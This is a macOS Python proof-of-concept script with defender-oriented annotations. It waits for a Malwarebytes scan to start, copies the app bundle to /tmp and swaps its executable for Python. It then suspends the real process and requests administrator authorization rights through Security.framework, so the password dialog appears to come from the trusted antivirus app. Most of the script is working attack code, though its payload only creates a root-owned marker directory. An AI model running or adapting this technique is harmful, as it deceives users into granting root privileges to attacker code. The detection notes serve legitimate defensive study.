Fake privileged helper auth
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""Proof of concept: a privileged authorization request issued from a copied app bundle.

Defender's reading of this script (macOS, Python 2.7), step by step as the code
below shows it:

1. Locate the installed Malwarebytes launcher bundle through Spotlight (``mdfind``
   by bundle identifier) and exit if none is found.
2. Block on ``log stream`` until the real ``FrontendApplication`` process logs a
   "scanInProgress" message.
3. Write a helper script to ``/tmp/auth.py`` that, via ctypes against
   Security.framework, requests three authorization rights with user interaction
   allowed and, on success, runs ``/bin/mkdir`` with elevated privileges.
4. Copy the real bundle to ``/tmp/Malwarebytes.app``, replace its main executable
   with the system Python interpreter, suspend the real process (SIGSTOP), run the
   helper through the copied bundle, then resume the real process (SIGCONT).
5. Delete the helper script and the copied bundle.

Presumably the point (see the gist title) is that the authorization dialog is
attributed to the copied app rather than to a Python process — TODO confirm
against the Authorization Services behaviour on the macOS version in question.

Observable artifacts useful for detection/IR: a bundle copied under /tmp whose
main executable no longer matches the original (a code-signature check on the
copy should fail), a script at /tmp/auth.py, SIGSTOP/SIGCONT delivered to
FrontendApplication, and an interactive authorization request coming from a
process that runs out of /tmp. Because step 5 removes the on-disk artifacts,
process- and file-event telemetry captured at the time is what remains.
"""
import os
import sys
import subprocess
import shutil
import time

# System Python 2.7 interpreter; later copied over the copied bundle's main executable.
python_bin = "/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python"
# Spotlight lookup by bundle identifier; empty string when nothing matches.
# NOTE(review): if mdfind returns several paths they stay newline-joined in this one value.
last_bundle_path = subprocess.check_output(['mdfind', "kMDItemCFBundleIdentifier == com.malwarebytes.mbam.frontend.launcher"]).strip("\n")
if not last_bundle_path:
    print("Hmm, no Malwarebytes found!!!")
    sys.exit(-1)

# Follow the unified log, filtered to FrontendApplication messages mentioning
# "scanInProgress" (--debug includes debug-level entries). Both pipes are
# captured but only stdout is read; the child is never terminated or waited on,
# so it keeps running after the loop below exits.
f = subprocess.Popen(['log', 'stream', '--predicate', 'process == "FrontendApplication" && eventMessage CONTAINS[c] "scanInProgress"', '--debug'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while True:
    line = f.stdout.readline()
    # Waits for the specific log line emitted when the real app starts a scan.
    if "inProgress.title.scanInProgress" in line:
        break
print("Malware scan started")

# Predictable, world-readable location for the helper script (a detection point).
tmp_script = "/tmp/auth.py"
# most of code from https://gist.github.com/pudquick/bc1ad98e7ee0a50fba94
#
# The embedded helper, as written below:
#   - loads Security.framework with ctypes and declares the AuthorizationItem /
#     AuthorizationItemSet structures;
#   - requests three rights at once (ServiceManagement daemons.modify and
#     blesshelper, plus system.privilege.admin) with an empty prompt string and
#     flags PreAuthorize | ExtendRights | InteractionAllowed, i.e. the user may
#     be shown a dialog;
#   - only if AuthorizationCopyRights returns 0 does it call
#     AuthorizationExecuteWithPrivileges to run /bin/mkdir on
#     ~/Desktop/DirOwnedByRoot, a root-owned directory serving as the success marker.
# NOTE(review): the embedded script's indentation appears to have been lost in
# this rendering (class bodies and the final `if` body are flush-left), so it is
# reproduced here byte-for-byte rather than corrected.
with open(tmp_script, "w") as f:
    f.write('''#!/usr/bin/python2.7
import os
from ctypes import CDLL, Structure, POINTER, c_char_p, c_size_t, c_void_p, c_uint32, pointer, byref
Security = CDLL('/System/Library/Frameworks/Security.framework/Versions/Current/Security')
prompt = ""
mkdir_bin = "/bin/mkdir"
flag_path = os.path.join(os.path.expanduser("~/Desktop"), "DirOwnedByRoot")
class OpaqueType(Structure):
pass
class AuthorizationItem(Structure):
_fields_ = [('name', c_char_p),
('valueLength', c_size_t),
('value', c_char_p),
('flags', c_uint32),
]
class AuthorizationItemSet(Structure):
_fields_ = [('count', c_uint32),
('items', POINTER(AuthorizationItem)),
]
class FILE(Structure):
pass
OpaqueTypeRef = POINTER(OpaqueType)
AuthorizationRef = OpaqueTypeRef
kSMRightModifySystemDaemons = "com.apple.ServiceManagement.daemons.modify"
kSMRightBlessPrivilegedHelper = "com.apple.ServiceManagement.blesshelper"
kAuthorizationRightExecute = "system.privilege.admin"
kAuthorizationEnvironmentPrompt = "prompt"
kAuthorizationEmptyEnvironment = None
kAuthorizationFlagDefaults = 0
kAuthorizationFlagInteractionAllowed = (1 << 0)
kAuthorizationFlagExtendRights = (1 << 1)
kAuthorizationFlagPartialRights = (1 << 2)
kAuthorizationFlagDestroyRights = (1 << 3)
kAuthorizationFlagPreAuthorize = (1 << 4)
AuthorizationCreate = Security.AuthorizationCreate
AuthorizationCopyRights = Security.AuthorizationCopyRights
AuthorizationExecuteWithPrivileges = Security.AuthorizationExecuteWithPrivileges
authref = AuthorizationRef()
result = AuthorizationCreate(None, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, byref(authref))
multi_right = (AuthorizationItem*3)()
multi_right[0].name = kSMRightModifySystemDaemons
multi_right[1].name = kSMRightBlessPrivilegedHelper
multi_right[2].name = kAuthorizationRightExecute
rights = AuthorizationItemSet()
rights.count = 3
rights.items = pointer(multi_right[0])
env_items = (AuthorizationItem*1)()
env_items[0].name = kAuthorizationEnvironmentPrompt
env_items[0].valueLength = len(prompt)
env_items[0].value = prompt
env = AuthorizationItemSet()
env.count = 1
env.items = pointer(env_items[0])
flags = kAuthorizationFlagDefaults | kAuthorizationFlagPreAuthorize | kAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed
result = AuthorizationCopyRights(authref, byref(rights), byref(env), flags, None)
argv = [flag_path]
argv = (c_char_p * (len(argv) + 1))(*(argv + [None]))
channel = POINTER(FILE)()
if result == 0:
result = AuthorizationExecuteWithPrivileges(authref, mkdir_bin, kAuthorizationFlagDefaults, argv, byref(channel))
''')

# PID of the real frontend process, used for the SIGSTOP/SIGCONT pair below.
mbam_pid = subprocess.check_output(['pgrep', 'FrontendApplication']).strip("\n")
tmp_bundle_path = "/tmp/Malwarebytes.app"
# Full copy of the real bundle into /tmp, then its main executable is swapped for
# the Python interpreter. The copy therefore no longer matches the original's
# code signature — a strong signal for integrity monitoring.
shutil.copytree(last_bundle_path, tmp_bundle_path)
mbam_bin = os.path.join(tmp_bundle_path, "Contents", "MacOS", "Malwarebytes")
os.unlink(mbam_bin)
shutil.copy(python_bin, mbam_bin)
# The real process is suspended while the helper runs and resumed afterwards;
# presumably so only the copy is active during the authorization request — TODO confirm.
subprocess.check_call(["kill", "-SIGSTOP", mbam_pid])
# Runs the helper through the copied bundle's "Malwarebytes" executable (now
# Python); blocks until the helper exits and raises on a non-zero status.
subprocess.check_call([mbam_bin, tmp_script])
subprocess.check_call(["kill", "-SIGCONT", mbam_pid])
# Cleanup of the on-disk artifacts; the still-running `log stream` child is not cleaned up.
os.unlink(tmp_script)
shutil.rmtree(tmp_bundle_path)